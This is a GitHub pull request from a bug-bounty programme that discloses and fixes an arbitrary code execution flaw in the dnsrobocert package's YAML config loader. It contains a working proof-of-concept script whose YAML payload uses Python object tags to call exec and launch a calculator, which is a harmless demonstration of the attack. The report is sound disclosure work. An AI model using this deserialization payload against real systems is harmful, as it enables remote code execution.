Skip to content
This repository has been archived by the owner on Dec 19, 2023. It is now read-only.

FIX Arbitrary Code Execution in - dnsrobortcert #1

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

FIX Arbitrary Code Execution in - dnsrobortcert #1

wants to merge 1 commit into from

Conversation

b1nslashsh
Copy link

@b1nslashsh b1nslashsh commented Feb 9, 2021
edited
Loading

📊 Metadata *

DNSroboCert is designed to manage Let's Encrypt SSL certificates based on DNS challenges which is vulnerable to Arbitrary Code Execution.

Bounty URL:

https://www.huntr.dev/bounties/1-pip-dnsrobocert

⚙️ Description *

changeing Fullloader to Safeloader in config.py will fix this issue

💻 Technical Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

🐛 Proof of Concept (PoC) *

Installation

pip install dnsrobocert
Run exploit.py

import os
#os.system('pip install dnsrobocert')
from dnsrobocert.core import config
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(exploit)
config.load('config.yml')

python3 exploit.py
The calc will poo

🔥 Proof of Fix (PoF) *

The Arbitrary code Execution has fixed👍

👍 User Acceptance Testing (UAT)

Yaml load working perfectly after FiX ,👍

🔗 Relates to...

https://www.huntr.dev/bounties/1-pip-dnsrobocert

@huntr-helper
Copy link
Member

👋 Hello, @adferrand - @b1nslashsh has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@adferrand & @b1nslashsh - thank you for your efforts in securing the world’s open source code! 🎉

huntr-helper pushed a commit to 418sec/huntr that referenced this pull request Feb 9, 2021
Added fix submission to FixSubmissionCount for 418sec/dnsrobocert#1
cb37b77
@b1nslashsh
Copy link
Author

b1nslashsh commented Feb 22, 2021
edited
Loading

hey @adferrand any update on this?

regards,
muhaimin

@adferrand
Copy link

Sorry I am on holidays for now, I will look at it next week.

@b1nslashsh
Copy link
Author

Sorry I am on holidays for now, I will look at it next week.

thats great 👍🏻

@b1nslashsh
Copy link
Author

Sorry I am on holidays for now, I will look at it next week.

Hey @adferrand ,
hope you are doing well
Any updates on this sorry for disturbing you

Regrads muhaimin

@Anon-Artist
Copy link

Hi @adferrand hope you are doing well
Have you considered this issue,
I saw a new release on your repo and the new release is also vulnerable to the same bug

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
4 participants
@b1nslashsh @huntr-helper @adferrand @Anon-Artist